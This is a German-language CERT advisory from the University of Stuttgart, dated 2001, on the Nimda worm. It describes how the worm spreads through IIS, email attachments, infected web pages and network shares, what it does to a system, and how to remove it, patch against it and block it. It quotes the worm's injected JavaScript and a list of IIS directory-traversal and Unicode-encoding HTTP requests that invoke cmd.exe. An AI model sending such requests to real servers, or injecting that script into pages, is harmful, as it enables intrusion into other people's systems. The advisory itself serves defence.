Sie sind hier: Home » Aktuelle Meldungen » Meldung
Meldung Nr: RUS-CERT-480

[MS/Generic, IIS] Neuer Wurm nutzt mehrere Schwachstellen zur Verbreitung aus (Update)
(2001-09-18 17:56:30+00) Druckversion


Ein Wurm namens Nimda nutzt scheinbar mehrere Schwachstellen von Microsoft Windows zur Verbreitung aus. Neben mehreren Schwachstellen des IIS-Webservers findet eine Verbreitung über ein E-Mail-Attachment (README.EXE) statt. Ferner werden durch manipulierte Webseiten (die mit einer readme.eml ersetzt wurden) Systeme mit ungepachtem Internet Explorer, bei dem Besuch der Webseite mit dem Internet Explorer, infiziert.

Betroffene Systeme

  • Microsoft Windows IIS Webserver
  • Microsoft Internet Explorer 5.x
  • Microsoft Outlook (Express) 5.x bzw. E-Mail-Clients die zur Darstellung von HTML-E-Mails auf den Internet Explorer 5.x zurückgreifen

Einfallstor

  • HTTP-Anfragen an einen IIS-Server.
  • E-Mail-Attachment mit Mime-Typ audio/x-wav
  • manipulierte Webseite (readme.eml), die eine Schwachstelle im Internet Explorer zur Ausführung des Programmcodes ausnutzt.
  • Netzlaufwerk-Freigaben

Auswirkung
Nach dem derzeitigen Stand der Analyse sind folgende Auswirkungen sehr wahrscheinlich:

  • Die Guests-Gruppe und der Guest-Account wird aktiviert und in die lokale Administrator-Gruppe aufgenommen.
  • Unter \Program Files\Common Files\msadc werden die Dateien root.exe, TFTP129, TFTP68, TFTP192 angelegt. Dateien der Form TFTP12345 (57.344 bytes) werden auch in den Verzeichnissen \Inetpub\scripts und \Inetpub\wwwroot angelegt (nur bei IIS Webservern).
  • TFTP-Download der Datei admin.dll (57.344 bytes), welche scheinbar auf C:\, D:\, E:\ und dem Web root Verzeichnis abgelegt wird.
  • In verschiedenen Ordnern wird die Datei riched20.dll (57.344 bytes) abgelegt, z.B. %windir%\system32
  • Unter %WINDIR% werden die Dateien load.exe, mmc.exe (57.344 bytes) und cmd.exe(208.144 bytes) abgelegt.
  • Die Datei system.ini wird verändert und shell=explorer.exe load.exe -dontrunold eingetragen, wodurch der Wurm beim Systemstart ausgeführt wird.
  • Die Netzlaufwerk-Freigabe c$ für C:\ wird eingerichtet (wird ohne reboot aktiviert).
  • Die Netzlaufwerk-Freigaben für alle lokalen Partitionen werden als versteckte Freigaben (z.B. D$) eingerichtet (aber erst nach einem reboot aktiviert)
  • Eine Datei namens readme.eml wird auf infizierten Webservern abgelegt, welche eine Schwachstelle im Internet Explorer zur Verbreitung ausnutzt. (Diese Dateien wurden durch den Internet Explorer automatisch ausgeführt).
  • Es werden index, readme, main, default .html,.htm,.asp Webseiten um folgenden Javascript Code erweitert: <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>, welcher die Datei readme.eml beim Aufruf herunterlädt und bei verwundbaren Clients ausführt.
  • Es werden in jedem Ordner, für den Schreibrechte bestehen, Dateien der Form xxxxxxx.eml (jeweils 79.225 bytes) bzw. xxxxxxx.nws abgelegt. Das Verhältnis steht dabei 95% eml- zu 5% nws-Dateien. Diese Dateien enthalten die Datei README.EXE, welche die Schadensroutine des Wurms enthält.
  • Es werden temporäre Dateien in Format mepXXX.tmp u. mepXXX.temp.exe im %WINDIR%-Verzeichnis angelegt, die offentsichtlich von den laufenden Scan- bzw. Infektionsprozessen stammen.
  • Es werden zahlreiche Schlüssel/Werte in der Registry verändert/hinzugefügt.
  • Es werden ausführbare Dateien angelegt bzw. verändert (z.B. eine Datei Iexplore.exe, dabei werden u.U. Eigenschaften des NTFS-Dateisystems genutzt, um die Entfernung zu erschweren).
  • Der Wurm versucht, verwundbare IIS-Systeme zwecks Weiterverbreitung zu finden.
  • Durch die offenbar bereits sehr große Zahl an schon infizierten Systemen erzeugt dieser Wurm in verschiedenen Netzen extrem hohe Netzlast, die zu Betriebseinschränkungen führen kann (Distributed Denial of Service Attack).
    Die Ziel-IP-Adressen für die weitere Verbreitung von Webserver zu Webserver werden nach folgendem Muster ausgewählt:
    • 50% IP-Adressen, die mit den ersten beiden Oktets der eigenen IP-Adresse übereinstimmen
    • 25% IP-Adressen, die mit dem ersten Oktet der eigenen IP-Adresse übereinstimmen
    • 25% IP-Adressen, die per Zufallsprinzip ausgewählt werden

Typ der Verwundbarkeit
design flaw

Gefahrenpotential
sehr hoch
(Hinweise zur Einstufung des Gefahrenpotentials.)

Beschreibung
Offenbar verbreitet sich ein neuer Wurm, der mehrere bereits bekannte Schwachstellen im IIS Webserver sowie dem Internet Explorer zur Verbreitung ausnutzt.

Im Binärcode des Wurms befindet sich folgender Hinweis:

Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
Der Wurm scheint einen eigenen SMTP-Client zur Weiterverbreitung mittels E-Mail-Attachments, wie sie z. B. auch der SirCam-Wurm benutzt, zu verwenden. Dabei wird der Wurm über ein Attachment (Mime-Typ audio/x-wav) mit dem Namen README.EXE versandt. Mailclients (wie Outlook (Express)), die auf den Internet Explorer zur Darstellung von HTML E-Mails zurückgreifen, führen das Attachment unmittelbar bei der Betrachtung der Mail aus, falls das unter [MS/IE/Outlook] Schwachstelle bei der Verarbeitung von falschen MIME Types beschriebene Sicherheitsupdate nicht installiert wurde.

Die Schwachstelle des Internet Explorers bei der Verarbeitung von falschen MIME Types wird von dem Wurm auch bei der Betrachtung von arglistigen Webseiten ausgenutzt. . So wird beim Besuch eines mit dem Wurm infizierten Webservers die Datei readme.eml ausgeführt, welche bei ungepachten Internet Explorern den eigentlichen Wurm (README.EXE) automatisch auf dem die Webseite besuchenden System ausführt (bzw. je nach Sicherheitseinstellung des Internet Explorers eine Interaktion des die Webseite Besuchenden erfordert).

Der Wurm kopiert sich selbst (README.EML) in alle Verzeichnisse des befallenen Systems und auf Netzlaufwerk-Freigaben, auf die der Zugriff gestattet ist.

Der Wurm versucht IIS-Webserver, die mit dem CodeRedII-Wurm infiziert sind, zu befallen. Dabei werden typischerweise HTTP-Requests der folgenden Form erzeugt:

  • GET /scripts/root.exe?/c+dir HTTP/1.0
  • GET /MSADC/root.exe?/c+dir HTTP/1.0
  • GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Des Weiteren scheint der neue Wurm die im Mai 2001 beschriebene Schwachstelle des IIS-Webservers [MS/IIS] zahlreiche Schwachstellen im Microsoft IIS 4.0/5.0 auszunutzen. Dabei werden typischerweise HTTP-Requests der folgenden Form erzeugt:
  • GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Außerdem nutzt er offenbar die im MS00-078/MS00-057 beschriebene Unicode-Schwachstelle des IIS-Webservers zur Verbreitung. Dabei werden typischerweise HTTP-Requests der folgenden Form erzeugt:
  • GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
  • GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

Bekannte Aliases

  • Code Rainbow
  • Concept Virus(CV) V.5
  • W32.Nimda.A@mm
  • W32/Minda@MM
  • PE_NIMDA.A

Entfernung des Wurms
Der Wurm wird sich (zumindest auf Server-Systemen) vermutlich nie zuverlässig automatisch entfernen lassen. Aus diesem Grund ist eine Neuinstallation des Systems von einem vertrauenswürdigen Datenträger und die Einspielung der neuesten Sicherheitspatches erforderlich - ohne das System vorher an das Internet oder das lokale Netz zu hängen, um eine erneute Infektion zu vermeiden. Danach sollte der Datenbestand vom Backup zurückgespielt werden und mit einem aktuellen Virenscanner überprüft werden. (Siehe auch den separaten Artikel zur Entfernung des Wurmes.) Zahlreiche Anti-Viren-Hersteller stellen dafür ein Update zur Verfügung:

Gegenmaßnahmen
Die von dem neuen Wurm verwendeten Schwachstellen sind seit längerer Zeit bekannt, Microsoft stellt Sicherheitsupdates zur Verfügug.

Für den Internet Explorer ist zumindest folgender Patch notwendig:

Für den IIS-Webserver ist zumindest folgende Patch notwendig:

Eine tabellarische Übersicht der Microsoft Windows Security Patches (engl. und dt.) mit Links zum Mirror der Security Patches auf dem ftp-Server der Universität Stuttgart befindet sich unter:

Eine tabellarische Auflistung der verfügbaren Sicherheitsupdates für den Internet Explorer und Outlook Express befindet sich unter:

Installieren Sie die aktuellen Anti-Virus-Updates.

Die Universität Stuttgart besitzt eine Campuslizenz für den McAfee Virenscanner, der in der aktuellen Version diesen Virus zuverlässig erkennt. Näheres hierzu erfahren Sie unter

Workaround
Benutzer des Internet Explorers sollten die fehlenden Sicherheitsupdates installieren und JavaScript bzw. Active Scripting deaktivieren.

Netzwerk-Administratoren könnten bei der Verwendung eines HTTP-Proxy-Server Dateien mit der Endung .eml sperren. Bei squid.conf würde dies beispielsweise so sehen:

acl worm urlpath_regex -i \.eml$
http_access deny worm
Des weiteren sollte wenn möglich die Übertragung von .exe Dateien am Mail-Gateway blockiert werden.

Weitere Information zu diesem Thema

(tf)

Weitere Artikel zu diesem Thema:

Hinweis
Die in diesem Text enthaltene Information wurde für die Mitglieder der Universität Stuttgart recherchiert und zusammengestellt. Die Universität Stuttgart übernimmt keinerlei Haftung für die Inhalte. Dieser Artikel darf ausschließlich in unveränderter Form und nur zusammen mit diesem Hinweis sowie dem folgenden Copyrightverweis veröffentlicht werden. Eine Veröffentlichung unter diesen Bedingungen an anderer Stelle ist ausdrücklich gestattet.

Copyright © 2016 RUS-CERT, Universität Stuttgart, http://cert.uni-stuttgart.de/

Vorherige Meldung Weitere Meldungen... Nächste Meldung

Bitte lesen Sie auch die Grundsätze, nach denen das RUS-CERT Tickermeldungen veröffentlicht. Der regelmäßige Bezug von Tickermeldungen über E-Mail und RSS-Feed ist ebenfalls möglich.